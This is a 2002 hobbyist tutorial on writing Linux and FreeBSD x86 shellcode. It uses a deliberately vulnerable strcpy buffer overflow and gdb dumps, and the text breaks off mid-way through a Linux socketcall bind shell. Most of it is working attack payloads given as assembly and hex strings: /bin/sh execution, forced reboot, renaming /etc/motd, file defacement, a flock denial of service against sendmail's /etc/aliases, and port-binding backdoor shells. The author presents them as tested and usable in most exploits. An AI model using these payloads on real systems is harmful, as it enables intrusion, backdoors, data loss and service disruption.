Author: zillion (safemode.org) Date: 10-04-2002
I wrote this document for the purpose of self-education and made it public so that it might be useful to other. This is not the type of document from which you can expect to learn shellcode developement in 21 hours ;-) If you are completely new to this subject, try playing with assembly a bit and take it easy with this file.
The shellcodes presented here have all been tested to work can be used in most exploits without a problem. However, these codes may cause serious damage to your computer and should therefor only be used against TEST systems that have NO network connectivity!. Imagin what happens if you run the backdoor on you system and forget about it....
If you have any comments or questions please feel free to them to mail me!
zillion
I prefer using nasm to compile assembly code and the examples used in this document are all written in the nasm syntax. Using nasm to compile the assembly code can be done as follows:
nasm -o prog prog.S
After executing this command, the file 'prog' will contain our binary data that we will translate to the shellcode. At this point you will not be able to execute this data directly from command line. You can use the utility that is placed at the end of this document. Usage of this tool will look like this:
gcc -o s-proc s-proc.c bash-2.04$ ./s-proc -e prog Calling code ... sh-2.04$ exit bash-2.04$ ./s-proc -p prog char shellcode[] = "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46" "\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1" "\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23\x41\x41\x41\x41" "\x42\x42\x42\x42"; bash-2.04$
Shellcode can be seen as a list of instructions that has been developed in a manner that allows it to be injected in an application during runtime.
Injecting shellcode in application can be done trough many different security holes of which buffer overflows are the most popular ones. In order to explain how shellcode is used, I will give a small buffer overflow example by using the following c program:
void main(int argc, char **argv, char **envp) { char array[200]; strcpy(array,argv[1]); }
If we compile this (gcc -o overflow overflow.c) and execute it with a very large string of characters we can overwrite memory:
On linux:
[root@droopy done]# ./overflow `perl -e 'print "A" x 220'`BBBB Segmentation fault (core dumped) [root@droopy done]#
On FreeBSD:
[root@freebsd done]# ./overflow `perl -e 'print "A" x 204'`BBBB Segmentation fault (core dumped) [root@freebsd done]#
Well that doesn't look good now does it ? ;-) It appears that we forced some memory corruption with the 220 A's and 4 B's that where given to the program as argument during the execution. That argument exceeded the size of the array and as a result of this, data that was stored behind this array got overwritten. You can see what happend by using gdb (the GNU debugger) to analyze the core dump file. Output generated by gdb often looks very scary for newcommers but have no fear.. there is a manual. BTW if you did not get a coredump try more A's or set ulimit to a number such as 99999 ( ulimit -c 99999 )
[root@droopy done]# gdb -core=core GNU gdb 5.0 Copyright 2000 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-redhat-linux". Core was generated by `./overflow AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'. Program terminated with signal 11, Segmentation fault. #0 0x42424242 in ?? () (gdb) info all eax 0xbffff990 -1073743472 ecx 0xfffffdc3 -573 edx 0xbffffcad -1073742675 ebx 0x4013b824 1075034148 esp 0xbffffa70 0xbffffa70 ebp 0x41414141 0x41414141 esi 0xbffffad4 -1073743148 edi 0x0 0 eip 0x42424242 0x42424242 eflags 0x10286 66182 cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x2b 43 gs 0x2b 43 st0 0 (raw 0x00000000000000000000) st1 0 (raw 0x00000000000000000000) st2 0 (raw 0x00000000000000000000) st3 0 (raw 0x00000000000000000000) st4 0 (raw 0x00000000000000000000) st5 0 (raw 0x00000000000000000000) st6 0 (raw 0x00000000000000000000) st7 0 (raw 0x00000000000000000000) fctrl 0x0 0 fstat 0x0 0 ftag 0x0 0 fiseg 0x0 0 fioff 0x0 0 foseg 0x0 0 fooff 0x0 0 fop 0x0 0
So by using GDB we can see the contents of all registers at the time 'overflow' got killed. I have made the most important registers bold. EBP and EIP are 32 bit registers (32/8 = 4 Byte) and are holding the last 8 bytes of our argument. In the above gdb output you can see that lines 'EBP' and 'EIP' are made bold. These are important lines from which we can indicate that memory was overwritten with data we control. As you can see EBP holds the value 0x41414141. 41 is the hex value for A meaning that EBP contains AAAA. The EIP register holds 0x42424242. 42 is the hex value of B meaning that EIP holds BBBB.
You can also use gdb to examine more memory by using the 'x' command. In this case we can see our buffer by using the command 'x/150 0xbffffa70' where 0xbffffa70 is the value that is obtained from the ESP register:
(gdb) x/150 $esp 0xbffffa70: 0x00000000 0xbffffad4 0xbffffae0 0x0804830e 0xbffffa80: 0x080482e4 0x4013b824 0xbffffaa8 0x40037b4c 0xbffffa90: 0x00000000 0xbffffae0 0x4013a358 0x40016638 0xbffffaa0: 0x00000002 0x08048380 0x00000000 0x080483a1 0xbffffab0: 0x0804845c 0x00000002 0xbffffad4 0x080482e4 0xbffffac0: 0x080484cc 0x4000df24 0xbffffacc 0x40016c0c 0xbffffad0: 0x00000002 0xbffffbc1 0xbffffbcc 0x00000000 0xbffffae0: 0xbffffcad 0xbffffcce 0xbffffced 0xbffffd0f 0xbffffaf0: 0xbffffd1b 0xbffffede 0xbffffefd 0xbfffff13 0xbffffb00: 0xbfffff1e 0xbfffff2d 0xbfffff35 0xbfffff45 0xbffffb10: 0xbfffff53 0xbfffff64 0xbfffff6f 0xbfffff80 0xbffffb20: 0xbfffffa3 0xbfffffb6 0xbfffffc3 0x00000000 0xbffffb30: 0x00000003 0x08048034 0x00000004 0x00000020 0xbffffb40: 0x00000005 0x00000006 0x00000006 0x00001000 0xbffffb50: 0x00000007 0x40000000 0x00000008 0x00000000 0xbffffb60: 0x00000009 0x08048380 0x0000000b 0x00000000 0xbffffb70: 0x0000000c 0x00000000 0x0000000d 0x00000000 0xbffffb80: 0x0000000e 0x00000000 0x00000010 0x0080f9ff 0xbffffb90: 0x0000000f 0xbffffbbc 0x00000000 0x00000000 0xbffffba0: 0x00000000 0x00000000 0x00000000 0x00000000 0xbffffbb0: 0x00000000 0x00000000 0x00000000 0x36383669 0xbffffbc0: 0x6f2f2e00 0x66726576 0x00776f6c 0x41414141 0xbffffbd0: 0x41414141 0x41414141 0x41414141 0x41414141 0xbffffbe0: 0x41414141 0x41414141 0x41414141 0x41414141 0xbffffbf0: 0x41414141 0x41414141 0x41414141 0x41414141 0xbffffc00: 0x41414141 0x41414141 0x41414141 0x41414141 0xbffffc10: 0x41414141 0x41414141 0x41414141 0x41414141 0xbffffc20: 0x41414141 0x41414141 0x41414141 0x41414141 0xbffffc30: 0x41414141 0x41414141 0x41414141 0x41414141 0xbffffc40: 0x41414141 0x41414141 0x41414141 0x41414141 0xbffffc50: 0x41414141 0x41414141 0x41414141 0x41414141 0xbffffc60: 0x41414141 0x41414141 0x41414141 0x41414141 0xbffffc70: 0x41414141 0x41414141 0x41414141 0x41414141 0xbffffc80: 0x41414141 0x41414141 0x41414141 0x41414141 0xbffffc90: 0x41414141 0x41414141 0x41414141 0x41414141 0xbffffca0: 0x41414141 0x41414141 0x42424242 0x44575000 0xbffffcb0: 0x6f682f3d 0x6e2f656d 0x736c6569 0x6f7a2f68 0xbffffcc0: 0x722f656e 0x79646165 (gdb)
Here we can see that EBP and EIP are located directly behind eachother. Now what most exploit do is that they put an address in EIP (Instruction pointer) that points to instructions they have put in the buffer that caused the overflow. Instructions ?? hey that includes our shellcode !! ;-)
Intel has 32 bit registers that can be split up in 16 and 8 bit. When developing shellcode you will find out that using the smallest registers often prevents having NULL bytes in code. Also using the right register for the right value should be considered effective programming. I mean would you put a mouse in a cage that was created for an elephant ?? I tought so ! ;p . Now lets have a look at the registers that we will be using.
32 Bit | 16 Bit | 8 Bit (High) | 8 Bit (Low) |
EAX | AX | AH | AL |
EBX | BX | BH | BL |
ECX | CX | CH | CL |
EDX | DX | DH | DL |
EAX, AX, AH and AL are called the 'Accumulator' registers and can be used for I/O port access, arithmetic, interrupt calls etc. Later in this document you will see that we can use these registers to use system calls.
EBX, BX, BH, and BL are the 'Base' registers and are used as base pointers for memory access. You will see later on that we will use this register to store pointers in for arguments of system calls. This register is also sometimes used to store return value from an interrupt in. An example of this can be seen when using the 'open' systems call. When you opened a file with this system call then the 'file' descriptor, which can be used for I/O with the opened file, will be stored in the EBX register.
ECX, CX, CH, and CL are also known as the 'Counter' registers. In the examples of this document you will see a loop that uses CL as a counter and some examples that will use ECX to store pointers in.
EDX, DX, DH, and DL are called the 'Data' registers and can be used for I/O port access , arithmetic and some intrerrupt calls.
When you want to execute a system call you will have to use these registers to prepare the system call. A very simple example is the exit(0) syscall:
mov al, 0x01 ; The syscall number for exit xor ebx, ebx ; EBX will now contain the value 0 int 0x80 ; and activate ! It is important to always use the smallest registers available to store you data in. This to avoid NULL bytes in shell code. For example if we would use the following exit code:
BITS 32 ; exit(0) code mov eax, 0x01 ; The syscall number for exit xor ebx, ebx ; EBX will now contain the value 0 int 0x80 ; and activate ! The register 'eax' will be to large to hold our byte with the result that NULL bytes will exist in our shellcode result:
su-2.05a# s-proc -p exit char shellcode[] = "\xb8\x01\x00\x00\x00\x31\xdb\xcd\x80"; By using 'ndisasm' , which is part of the nasm package, we can see how the large register is translated: su-2.05a# ndisasm exit 00000000 B80100 mov ax,0x1 00000003 0000 add [bx+si],al 00000005 31DB xor bx,bx 00000007 CD80 int 0x80
In most cases of shellcode you cannot use hardcoded memory addresses. So in order to know where your data is located, you'll need to do a little trick: jmp short stuff code: pop esi
<data> stuff: call code db 'This is my string#' What you see in the above code is that we 'jmp' from the beginning of the code to 'stuff' from where we 'call code'. At the beginning from 'code' we 'pop esi'. Now esi will represent the location of the string 'This is my string' In the above sample [esi + 1] represents 'h' from the word 'This'.
NULL bytes are string delimeters and kill shellcode. If you created shellcode that contains such bytes: Don't bother using it and try to fix the problem. So since you cannot have NULL bytes in the shellcode you will have to add them at runtime. Now that we have seen in the above example how to get the location of bytes in our string: jmp short stuff code: pop esi xor eax,eax ; doing this will make eax NULL mov byte [esi + 17],al ; put a null byte byte on [esi + 17] stuff: call code db 'This is my string#' In the above example we replace '#' with a NULL byte and terminate the string 'This is my string' at run time. For clean coding purposes it I find it the best to alter you strings at the beginning of you assembly code. Please note that NULL bytes are not the only problem! Other bytes such as newlines and special characters can also cause problems !.
Dont run this code on a production system ! Sync brings the hard disk state of the file system in sync with the internal state of the file system. We have to put this in front of the reboot() syscall to avoid loss of data that hasn't been written by the harddisk on the file system. Using this code can ofcourse still result in dataloss because active processes are *not* terminated properly before the reboot. Since we don't need to alter any data in this code, their is no need to find out from what location we are working:
BITS 32 pop esi xor eax, eax mov al,36 int 0x80 mov al,36 int 0x80 mov al, 88 mov ebx, 0xfee1dead mov ecx, 672274793 mov edx, 0x1234567 int 0x80
Shellcode produced by this assembly code:
[root@droopy doc]# nasm -o reboot reboot.S [root@droopy doc]# s-proc -p reboot char shellcode[] = "\x5e\x31\xc0\xb0\x24\xcd\x80\xb0\x24\xcd\x80\xb0\x58\xbb\xad" "\xde\xe1\xfe\xb9\x69\x19\x12\x28\xba\x67\x45\x23\x01\xcd\x80";
The FreeBSD code for this is much simpler and doesn't require you to add sync() in front of it:
BITS 32 xor eax,eax mov dx,9998 sub dx,9990 mov al, 55 int 0x80
The FreeBSD shellcode created by this code: char shellcode[] = "\x31\xc0\x66\xba\x0e\x27\x66\x81\xea\x06\x27\xb0\x37\xcd\x80";
Additionally FreeBSD also has many more different flags for reboots which you can use to do some funky stuff ;-) see: /usr/include/sys/reboot.h for more information.
The rename syscall looks like this (taken from 'man rename'): int rename(const char *oldpath, const char *newpath); So in order to use this syscall successful we need two pointers to our old and new file. To get an adress from a string we can use 'lea' in assembly. BITS 32 jmp short callit doit: pop esi xor eax, eax mov byte [esi + 9], al ; terminate arg 1 mov byte [esi + 24], al ; terminate arg 2 mov byte al, 38 ; the syscall rename = 83 lea ebx, [esi] ; put the address of /etc/motd (esi) in ebx lea ecx, [esi + 10] ; put the address of /etc/ooops.txt (esi + 10) in ecx int 0x80 ; We have everything ready so lets call the kernel mov al, 0x01 ; prepare to exit() xor ebx, ebx ; clean up int 0x80 ; and exit ! callit: call doit db '/etc/motd#/etc/ooops.txt#' Please note that the 'db' line can also be formatted like this, it doesn't make any difference: db '/etc/motd#' db '/etc/ooops.txt#' Shellcode produced from this assembly code, after we compiled it, will look like this:
char shellcode[] = "\xeb\x18\x5e\x31\xc0\x88\x46\x09\x88\x46\x18\xb0\x26\x8d\x1e" "\x8d\x4e\x0a\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xe3\xff\xff" "\xff\x2f\x65\x74\x63\x2f\x6d\x6f\x74\x64\x23\x2f\x65\x74\x63" "\x2f\x6f\x6f\x6f\x70\x73\x2e\x74\x78\x74\x23";
Execve is the almighty system call that can be used to execute a file. The linux implementation looks like this:
int execve (const char *filename, char *const argv [], char *const envp[]);
So what we need is to get 3 pointers, one to our filename, one to the arguments array and one to environment array. Since we are not interested in the environment array we will use NULL for it. We will implement this execve as follows:
execve("pointer to string /bin/sh","pointer to /bin/sh","pointer to NULL");
BITS 32 jmp short callit ; jmp trick as explained above doit: pop esi ; esi now represents the location of our string xor eax, eax ; make eax 0 mov byte [esi + 7], al ; terminate /bin/sh lea ebx, [esi] ; get the adress of /bin/sh and put it in register ebx mov long [esi + 8], ebx ; put the value of ebx (the address of /bin/sh) in AAAA ([esi +8]) mov long [esi + 12], eax ; put NULL in BBBB (remember xor eax, eax) mov byte al, 0x0b ; Execution time! we use syscall 0x0b which represents execve mov ebx, esi ; argument one... ratatata /bin/sh lea ecx, [esi + 8] ; argument two... ratatata our pointer to /bin/sh lea edx, [esi + 12] ; argument three... ratataa our pointer to NULL int 0x80 callit: call doit ; part of the jmp trick to get the location of db db '/bin/sh#AAAABBBB'
Note that the #AAAABBBB characters are not needed in the shellcode but removing them can have the result that the the shellcode corrupts memory which causes it to fail. This assembly code can be used to create the following shellcode: char shellcode[] = "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46" "\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1" "\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23\x41\x41\x41\x41" "\x42\x42\x42\x42";
In the above example syscall argument data is stored in the CPU registers (eax,ecx,edx etc). This is the way how Linux likes it. On *BSD systems argument are given to system calls by pushing them on the stack. Below is an example for an execve syscall on FreeBSD:
BITS 32 jmp short callit doit: pop esi xor eax, eax mov byte [esi + 7], al push eax push eax push esi mov al,59 push eax int 0x80 callit: call doit db '/bin/sh'
And the result:
su-2.05a# s-proc -p execve char shellcode[] = "\xeb\x0e\x5e\x31\xc0\x88\x46\x07\x50\x50\x56\xb0\x3b\x50\xcd" "\x80\xe8\xed\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"; su-2.05a# s-proc -e execve Calling code ... #
From the execve man page: int execve (const char *filename, char *const argv [], char *const envp[]); So we need a pointer to our file name, argument array and environment array. The last called array may also be replaced with NULL and that is what we will do ;-) Remember.. you can use execve for any program ! BITS 32 jmp short callit doit: ; Part one: Manipulate the string defined after 'db' pop esi ; esi now represents our string xor eax, eax ; mov byte [esi + 7], al ; put null byte after /bin/sh and ths terminate the string mov byte [esi + 10], al ; ditto but then after -i ; Part two: Prepare the arguments for our system call mov long [esi + 11], esi ; get address of /bin/sh and store it in AAAA lea ebx, [esi + 8] ; get adress of -i and store it in ebp mov long [esi + 15], ebx ; store the address in [esi + 15] -> BBBBB mov long [esi + 19], eax ; put NULL in CCCC ; Part three: Prepare execution and execute mov byte al, 0x0b ; 0x0b is the execve system call mov ebx, esi ; ebx = argument 1 lea ecx, [esi + 11] ; arguments pointer lea edx, [esi + 19] ; environment pointer int 0x80 mov al, 0x01 xor ebx, ebx int 0x80 callit: call doit db '/bin/sh#-i#AAAABBBBCCCC' [root@droopy execve-2]# nasm -o execve execve.S [root@droopy execve-2]# s-proc -p execve char shellcode[] = "\xeb\x27\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x89\x76\x0b\x8d" "\x5e\x08\x89\x5e\x0f\x89\x46\x13\xb0\x0b\x89\xf3\x8d\x4e\x0b" "\x8d\x56\x13\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xd4\xff\xff" "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23\x2d\x69\x23\x41\x41\x41" "\x41\x42\x42\x42\x42\x43\x43\x43\x43"; [root@droopy execve-2]# s-proc -e execve Calling code ... sh-2.04#
Again we will use the following defenition: int execve (const char *filename, char *const argv [], char *const envp[]); And our goal is as follows: int execve (AAAA,pointer to array AAAABBBBCCCC,DDDD); BITS 32 jmp short callit doit: pop esi xor eax, eax mov byte [esi + 7], al ; terminate /bin/sh mov byte [esi + 10], al ; terminate -c mov byte [esi + 18], al ; terminate /bin/ls mov long [esi + 20], esi ; address of /bin/sh in AAAA lea ebx, [esi + 8] ; get address of -c mov long [esi + 24], ebx ; store address of -c in BBBB lea ebx, [esi + 11] ; get address of /bin/ls mov long [esi + 28], ebx ; store address of /bin/ls in CCCC mov long [esi + 32], eax ; put NULL in DDDD mov byte al, 0x0b ; prepare the execution, we use syscall 0x0b (execve) mov ebx, esi ; program lea ecx, [esi + 20] ; argument array (/bin/sh -c /bin/ls) lea edx, [esi + 32] ; NULL int 0x80 ; call the kernel to look at our stuff ;-) callit: call doit db '/bin/sh#-c#/bin/ls#AAAABBBBCCCCDDDD' [root@droopy execve-3]# s-proc -p execve char shellcode[] = "\xeb\x2a\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x88\x46\x12\x89" "\x76\x14\x8d\x5e\x08\x89\x5e\x18\x8d\x5e\x0b\x89\x5e\x1c\x89" "\x46\x20\xb0\x0b\x89\xf3\x8d\x4e\x14\x8d\x56\x20\xcd\x80\xe8" "\xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23\x2d\x63\x23" "\x2f\x62\x69\x6e\x2f\x6c\x73\x23\x41\x41\x41\x41\x42\x42\x42" "\x42\x43\x43\x43\x43\x44\x44\x44\x44"; [root@droopy execve-3]# s-proc -e execve Calling code ... execve execve.S [root@droopy execve-3]#
BITS 32 jmp short callit doit: pop esi xor eax, eax mov byte [esi + 14], al ; terminate /tmp/hacked.txt mov byte [esi + 29],0xa ; 0xa == newline mov byte [esi + 30], al ; terminate niels was here lea ebx, [esi + 15] ; get address mov long [esi + 31], ebx ; put the address of niels--here in xxxx mov al, 5 ; the syscall open() = 5 lea ebx, [esi] ; argument #1 mov cx, 1090 ; 1024 (append) + 64 (create if no exist) + 2 rw mov dx, 744q ; if we need to create, these are the permissions int 0x80 ; kernel int mov long ebx,eax ; get the descriptor mov al, 4 mov ecx,[esi + 31] ; the location of our data mov dx, 15 ; the size of our data int 0x80 ; kernel interrupt mov al, 6 ; the close syscall = 6 int 0x80 ; clozzzz mov al, 0x01 ; exit system call xor ebx, ebx ; clean up int 0x80 ; and bail out callit: call doit db '/tmp/owned.txt#' db 'niels was here #xxxx' Now this code will generate the following shellcode: sh-2.04$ ../../../process open shellcode Calling code ... bash-2.05$ cat shellcode char shellcode[] = "\xeb\x38\x5e\x31\xc0\x88\x46\x0e\xc6\x46\x1d\x0a\x88\x46\x1e" "\x8d\x5e\x0f\x89\x5e\x1f\xb0\x05\x8d\x1e\x66\xb9\x42\x04\x66" "\xba\xe4\x01\xcd\x80\x89\xc3\xb0\x04\x8b\x4e\x1f\x66\xba\x0f" "\x00\xcd\x80\xb0\x06\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xc3" "\xff\xff\xff\x2f\x74\x6d\x70\x2f\x6f\x77\x6e\x65\x64\x2e\x74" "\x78\x74\x23\x6e\x69\x65\x6c\x73\x20\x77\x61\x73\x20\x68\x65" "\x72\x65\x20\x23\x78\x78\x78\x78"; bash-2.05$ As you can see there is a NULL byte in it and thus this shellcode cannot be used So lets find out what the problem is by using ndisasm. bash-2.04$ ndisasm open 00000000 EB38 jmp short 0x3a 00000002 5E pop si 00000003 31C0 xor ax,ax 00000005 88460E mov [bp+0xe],al 00000008 C6461D0A mov byte [bp+0x1d],0xa 0000000C 88461E mov [bp+0x1e],al 0000000F 8D5E0F lea bx,[bp+0xf] 00000012 895E1F mov [bp+0x1f],bx 00000015 B005 mov al,0x5 00000017 8D1E66B9 lea bx,[0xb966] 0000001B 42 inc dx 0000001C 0466 add al,0x66 0000001E BAE401 mov dx,0x1e4 00000021 CD80 int 0x80 00000023 89C3 mov bx,ax 00000025 B004 mov al,0x4 00000027 8B4E1F mov cx,[bp+0x1f] 0000002A 66BA0F00CD80 mov edx,0x80cd000f <-- beh ! 00000030 B006 mov al,0x6 00000032 CD80 int 0x80 00000034 B001 mov al,0x1 00000036 31DB xor bx,bx 00000038 CD80 int 0x80 0000003A E8C3FF call 0x0 0000003D FF db 0xFF 0000003E FF2F jmp far [bx] 00000040 746D jz 0xaf 00000042 702F jo 0x73 00000044 6F outsw 00000045 776E ja 0xb5 00000047 65642E7478 cs jz 0xc4 0000004C 7423 jz 0x71 0000004E 6E outsb 0000004F 69656C7320 imul sp,[di+0x6c],0x2073 00000054 7761 ja 0xb7 00000056 7320 jnc 0x78 00000058 686572 push word 0x7265 0000005B 652023 and [gs:bp+di],ah 0000005E 7878 js 0xd8 00000060 7878 js 0xda As you might have already seen that the number of bytes we want to write is causing a problem. That means the following line needs a fix: mov dx, 15 We can fix that by using the following trick: mov dx,9995 ; A trick to get 15 in dx without getting null bytes sub dx,9980
So what we do is we store 9995 in dx and substract 9980 from it. As a result dx will contain 15, which is exactly the amount of bytes we want to write in the opened file. After correcting this error we get the following shellcode: char shellcode[] = "\xeb\x39\x5e\x31\xc0\x88\x46\x0e\x88\x46\x1e\x8d\x5e\x0f\x89" "\x5e\x1f\xb0\x05\x8d\x1e\x66\xb9\x42\x04\x66\xba\xe4\x01\xcd" "\x80\x89\xc3\xb0\x04\x8b\x4e\x1f\x66\xba\x0b\x27\x66\x81\xea" "\xfc\x26\xcd\x80\xb0\x06\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8" "\xc2\xff\xff\xff\x2f\x74\x6d\x70\x2f\x6f\x77\x6e\x65\x64\x2e" "\x74\x78\x74\x23\x6e\x69\x65\x6c\x73\x20\x77\x61\x73\x20\x68" "\x65\x72\x65\x20\x23\x78\x78\x78\x78";
And gone is the null byte ! ;-)
This shellcode abused a weakness in sendmail that can prevent that application from being able to work properly. More information about that issue can be found here: http://www.sendmail.org/LockingAdvisory.txt BITS 32 jmp short callit doit: pop esi xor ebx,ebx ; Make sure the registers we use xor eax,eax ; are clean mov eax,0x2 ; 0x2 is fork(). This function returns int 0x80 ; A process ID to the parent and a 0 to the ; child process. We can test on this and let test eax,eax ; the parent process exit. This is an important jnz exit ; test which can be crucial with forking bind ; shellcode. (man fork) xor eax,eax mov [esi + 12],al ; Terminate /etc/aliases mov ecx,eax ; ecx = 0 mov ebx,esi ; The ebx register will contain the mov al,5 ; location of our data which is 'esi' int 0x80 ; we open() the file and safe the returned xor ebx,ebx ; file descriptor in ebx after cleaning this mov ebx,eax ; register with xor. mov cl,0x2 ; We want an exclusively lock mov al,143 ; flock() int 0x80 ; call kernel and make the lock a fact sub cl,0x3 ; Start a infinite loop to make sure l00p: ; that sendmail cannot access the file js l00p callit: call doit db '/etc/aliases' exit: ; Exit will get called in the parent process xor eax,eax ; This is not really needed I guess you can just mov al,1 ; let it crash to safe space ;-) int 0x80 ; Execute !! ;-))
While port binding shellcode looks very complex, it isn't really that hard to write it. It very much like the above example, several system calls on a row from which some are using information that was returned from another (I introduced this in the above example). When writing a bit more complex code it can help if you first write it in c. In our case just ripped the c source of the port binding shellcode that Taeho Oh wrote for his shellcode document and made some minor changes to it. The assembly code generated from this c source is ofcourse hombrewn and works like a charm on FreeBSD.
#include<unistd.h> #include<sys/socket.h> #include<netinet/in.h> int soc,cli; struct sockaddr_in serv_addr; int main() { if(fork()==0) { serv_addr.sin_family=2; serv_addr.sin_addr.s_addr=0; serv_addr.sin_port=0xAAAA; soc=socket(2,1,6); bind(soc,(struct sockaddr *)&serv_addr,0x10); listen(soc,1); cli=accept(soc,0,0); dup2(cli,0); dup2(cli,1); dup2(cli,2); execve("/bin/sh",0,0); } }
The assembly code I generated from this C source:
BITS 32 jmp short callit doit: pop esi xor eax, eax mov byte [esi + 7], al ; Terminate the /bin/sh string mov al,2 ; The fork() system call int 0x80 ; We call the kernel to fork us. ; ; Next code: socket(2,1,6) push byte 0x06 ; The 3e argument push byte 0x01 ; The 2e argument push byte 0x02 ; The 1e argument mov al,97 ; The system call number push eax ; int 0x80 ; And call the kernel ; ; Next code: bind(soc,(struct sockaddr *)&serv_addr,0x10); mov edx,eax ; We store the file descriptor that was returned from socket() in edx xor eax,eax ; Now we will create the sockaddr_in structure mov byte [esi + 9],0x02 ; This equals: serv_addr.sin_family=2 mov word [esi + 10],0xAAAA ; This equals: serv_addr.sin_port=0xAAAA mov long [esi + 12],eax ; This equals: serv_addr.sin_addr.s_addr=0 push byte 0x10 ; We now start with pushing the arguments, 0x10 is the 3e one. lea eax,[esi + 8] ; Get the address of our structure, arg 2 of bind() is a pointer. push eax ; And push it on the stack, our second argument is a fact push edx ; And we push the last argument, the file descriptor, on the stack xor eax,eax ; Clean up mov al,104 ; System call 104 represents bind. push eax ; int 0x80 ; And call the kernel ; ; Next code: listen(soc,1); push byte 0x1 ; We push the first argument on the stack push edx ; We push the filedescriptor that is still stored in the edx register xor eax,eax ; Cleanup mov al,106 ; System call 106 represents listen push eax ; int 0x80 ; And call the kernel ; ; Next code: accept(soc,0,0); xor eax,eax ; We need zero's for the arguments. push eax ; Push the last argument, a zero push eax ; Push the second argument, another zero push edx ; Push the first argument, the file descriptor of our socket mov al,30 ; Define the system call we like to use, accept() push eax ; int 0x80 ; And call the kernel to process our data ; ; Next code: dup2(cli,0) , dup2(cli,1) and dup2(cli,2) ; We will do this in a loop since this creates smaller code. mov cl,3 ; Define our counter = 3 mov ebx,-1 ; The C code for our loop is: b = -1; for(int i =3;i>0;i--) { dup(cli,++b) }; mov edx,eax ; We store the file descriptor from accept() in edx. ; l00p: ; The loop code starts here. inc ebx ; This is the instead of the ++b code push ebx ; We push this value first because it represents the last argument push edx ; We push the second argument, the file descriptor from accept() mov al,90 ; We define the system call push eax ; int 0x80 ; And call the kernel to execute sub cl, 1 ; Substract 1 from cl jnz l00p ; This will continue the loop if cl != 0 ; ; Next the execve of /bin/sh xor eax,eax ; First we create some zero's push eax ; The 3e argument == NULL push eax ; So is the second push esi ; The first argument is a pointer to our string /bin/sh mov al,59 ; We define the system call, execve. push eax ; int 0x80 ; And execute callit: call doit db '/bin/sh'
And again the most important part, the result:
char shellcode[] = "\xeb\x6a\x5e\x31\xc0\x31\xdb\x88\x46\x07\xb0\x02\xcd\x80\x6a" "\x06\x6a\x01\x6a\x02\xb0\x61\x50\xcd\x80\x89\xc2\x31\xc0\xc6" "\x46\x09\x02\x66\xc7\x46\x0a\xaa\xaa\x89\x46\x0c\x6a\x10\x8d" "\x46\x08\x50\x52\x31\xc0\xb0\x68\x50\xcd\x80\x6a\x01\x52\x31" "\xc0\xb0\x6a\x50\xcd\x80\x31\xc0\x50\x50\x52\xb0\x1e\x50\xcd" "\x80\xb1\x03\xbb\xff\xff\xff\xff\x89\xc2\x43\x53\x52\xb0\x5a" "\x50\xcd\x80\x80\xe9\x01\x75\xf3\x31\xc0\x50\x50\x56\xb0\x3b" "\x50\xcd\x80\xe8\x91\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
Linux socket code is a bit different then the BSD one. The problem is that linux has one socket system call that can be used to query other socket functions (an API) This system call is called 'socketcall' and is executed with two arguments. The first argument is a number that represent a socket function (such as listen()). The second argument is a pointer to an array that contains the argument that have to be given to the by the first argument defined function.. ;-) Not very useful for shellcode development.
Socketcall is called like this:
socketcall(<function number>,<arguments for that function>)
Below are the available function numbers:
SYS_SOCKET 1 SYS_BIND 2 SYS_CONNECT 3 SYS_LISTEN 4 SYS_ACCEPT 5 SYS_GETSOCKNAME 6 SYS_GETPEERNAME 7 SYS_SOCKETPAIR 8 SYS_SEND 9 SYS_RECV 10 SYS_SENDTO 11 SYS_RECVFROM 12 SYS_SHUTDOWN 13 SYS_SETSOCKOPT 14 SYS_GETSOCKOPT 15 SYS_SENDMSG 16 SYS_RECVMSG 17
And ofcourse the implementation:
BITS 32 xor eax, eax ; NULL eax inc eax ; eax represents 1 now mov long [esi +12],eax ; mov ebx,eax inc eax mov long [esi +8],eax add al,0x04 mov long [esi +16],eax lea ecx,[esi +8] mov al,102 ; 102 == socketcall int 0x80 ; call the kernel mov edx,eax ; store the file descriptor in edx xor eax, eax ; Null eax ; Now lets make the serv_addr struct mov byte [esi + 8],0x02 ; This equals: serv_addr.sin_family=2 mov word [esi + 10],0xAAAA ; This equals: serv_addr.sin_port=0xAAAA mov long [esi + 12],eax ; This equals: serv_addr.sin_addr.s_addr=0 mov long [esi + 17],edx ; edx the file descriptor lea ecx,[esi + 8] ; load effective address of the struct mov long [esi + 21],ecx ; and store it in [esi + 21] inc ebx mov ecx,ebx add cl,14 mov long [esi + 25],ecx lea ecx,[esi +17] mov al,102 int 0x80 mov al,102 inc ebx inc ebx int 0x80 xor eax,eax inc ebx mov long [esi + 21],eax mov long [esi + 25],eax mov al,102 int 0x80 mov ebx,eax ; Save the file descriptor in ebx xor eax,eax ; NULL eax mov long [esi + 12], eax ; mov ecx,eax ; 0 == stdin mov al,63 ; dub2() int 0x80 ; Call kernel inc ecx ; 1 == stdout mov al,63 ; dub2() int 0x80 ; Call kernel inc ecx ; 2 == stderr mov al,63 ; dub2() int 0x80 ; Call kernel ; From here it is just a matter of jmp short callit ; executing a shell (/bin/bash) doit: pop esi xor eax, eax mov byte [esi + 9], al lea ebx, [esi] mov long [esi + 11], ebx mov long 